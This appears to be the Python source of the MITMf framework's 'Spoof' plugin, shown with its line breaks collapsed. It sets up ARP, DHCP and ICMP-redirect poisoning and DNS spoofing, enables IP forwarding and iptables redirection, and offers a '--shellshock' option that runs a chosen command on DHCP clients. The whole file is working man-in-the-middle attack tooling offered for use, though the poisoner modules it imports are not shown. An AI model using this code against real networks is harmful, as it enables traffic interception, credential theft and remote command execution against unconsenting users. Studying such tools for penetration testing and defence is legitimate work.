# Copyright (c) 2014-2016 Marcello Salvati # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # from plugins.plugin import Plugin class Spoof(Plugin): name = "Spoof" optname = "spoof" desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" version = "0.6" has_opts = True def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.manualiptables = options.manualiptables self.protocol_instances = [] from core.utils import iptables, shutdown, set_ip_forwarding #Makes scapy more verbose debug = False if options.arp: if not options.gateway: shutdown("[Spoof] --arp argument requires --gateway") from core.poisoners.arp.ARPpoisoner import ARPpoisoner arp = ARPpoisoner(options) arp.debug = debug self.tree_info.append('ARP spoofing enabled') self.protocol_instances.append(arp) elif options.dhcp: from core.poisoners.dhcp.DHCPpoisoner import DHCPpoisoner if options.targets: shutdown("[Spoof] --targets argument invalid when DCHP spoofing") dhcp = DHCPpoisoner(options, self.config['Spoof']['DHCP']) dhcp.debug = debug self.tree_info.append('DHCP spoofing enabled') self.protocol_instances.append(dhcp) elif options.icmp: from core.poisoners.icmp.ICMPpoisoner import ICMPpoisoner if not options.gateway: shutdown("[Spoof] --icmp argument requires --gateway") if not options.targets: shutdown("[Spoof] --icmp argument requires --targets") icmp = ICMPpoisoner(options) icmp.debug = debug self.tree_info.append('ICMP spoofing enabled') self.protocol_instances.append(icmp) if options.dns: from core.servers.dns.DNSchef import DNSChef self.tree_info.append('DNS spoofing enabled') if not options.manualiptables: if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: shutdown("[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns") set_ip_forwarding(1) if not options.manualiptables: if iptables().http is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: protocol.start() def options(self, options): group = options.add_mutually_exclusive_group(required=False) group.add_argument('--arp', dest='arp', action='store_true', help='Redirect traffic using ARP spoofing') group.add_argument('--icmp', dest='icmp', action='store_true', help='Redirect traffic using ICMP redirects') group.add_argument('--dhcp', dest='dhcp', action='store_true', help='Redirect traffic using DHCP offers') options.add_argument('--dns', dest='dns', action='store_true', help='Proxy/Modify DNS queries') options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]') options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison') options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') def on_shutdown(self): from core.utils import iptables, set_ip_forwarding for protocol in self.protocol_instances: if hasattr(protocol, 'stop'): protocol.stop() if not self.manualiptables: iptables().Flush() set_ip_forwarding(0)